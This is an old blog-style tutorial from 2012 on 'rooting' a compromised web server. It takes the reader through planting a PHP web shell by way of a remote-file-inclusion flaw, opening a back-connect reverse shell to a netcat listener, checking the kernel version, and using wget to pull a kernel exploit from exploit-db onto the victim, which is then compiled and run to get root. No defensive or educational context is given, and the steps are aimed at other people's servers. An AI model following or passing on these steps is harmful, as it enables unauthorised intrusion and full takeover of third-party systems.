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Rooting Tutorial

Written By Unknown on Saturday, 20 October 2012 | 18:59

What we need?
-RFI Vulnerable Script
-PHP Shell

First of all, we need to get a shell on a site.
For this tutorial i will be using MulCi Shell.

So, once you have it on a site, go to the 'Backdoor Host' tab and forward a port.

Now, go to the 'Back Connect' tab and insert the following settings:
1- Your IP Address.
2-The port you forwarded.

Now, go on CMD and type in:cd 'Path To Your Netcat.exe' and then you need to make netcat listen to the port you forwarded.To do this, type:nc -l -n -v -p port

It looked like this for me:

Microsoft Windows XP [Version 5.1.2600]
Copyright 1985-2001 Microsoft Corp.

C:\KroKite>cd C:\


C:\WINDOWS>nc -l -n -v -p 4444
listening on [any] 4444 ...

Now, when you have netcat listening to the port you forwarded, click 'Connect'.

When your connected, type 'whoami'.You shouldnt have root.

Now, to find an exploit to root the box, you need to know whats the kernel version.To do this, just type 'uname -a'.

It should look something like this:
Linux linux1.dmehosting.com 2.6.17-92.1.10.el5PAE #1 SMP Tue Aug 5 0805 EDT 2008 i686
Now, we go on exploit-db.com and we will look for '2.6.17'.

Now, we type 'wget http://www.exploit-db.com/exploits/5092/ on the netcat window.
wget http://xpl_url.com

So the exploit works, you must compile it in the server(gcc) and execute it via exploit(-o).

To do this we type 'gcc 5092 -o exploit'.
gcc 5092 -o exploit

5092- After the url path.http://www.site.com/5092.
exploit- Output name.

Now you can execute your exploit by typing './exploit'

Wait for the exploit to finish running and type root again.

It should output in something like this:
uid=0(root) gid=0(root) groups=500(apache)

This means you have successfully rooted the box .

credit to KroKite 
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